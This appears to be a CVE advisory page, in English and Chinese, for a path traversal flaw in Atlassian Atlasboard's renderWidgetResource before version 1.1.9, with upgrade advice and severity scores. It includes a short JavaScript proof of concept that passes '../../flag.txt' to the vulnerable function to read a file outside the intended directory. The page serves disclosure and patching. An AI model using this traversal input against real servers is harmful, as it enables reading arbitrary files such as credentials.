CVE-2021-39109
Path traversal in atlasboard
描述
The renderWidgetResource resource in Atlasian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability. ### PoC ```javascript const widget = require(\"atlasboard/lib/webapp/routes/widget\"); // Mock req and res const req = {}; const res = { sendFile: (filePath) => { // Read and return file contents synchronously const data = fs.readFileSync(filePath, \"utf8\"); console.log(\"Contents of /flag.txt:\"); console.log(data); }, status: function (code) { this.statusCode = code; return this; }, send: function (msg) { throw new Error(`Server responded with status ${this.statusCode}: ${msg}`); }, }; // localPackagesPath set to root to allow traversal to /flag.txt const localPackagesPath = \"/\"; // resource string with path traversal to escape localPackagesPath and widgets directory const resource = \"../../flag.txt\"; // Call vulnerable function await widget.renderWidgetResource(localPackagesPath, resource, req, res); ```
如何修補 CVE-2021-39109
要修補 CVE-2021-39109,請將受影響套件升級到下列已修補版本。
- —升級至 1.1.9 或更新版本
CVE-2021-39109 正在被利用嗎?
低 — EPSS 為 0.5%,目前沒有觀察到大規模利用活動。
受影響套件(1)
- from 0, < 1.1.9
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |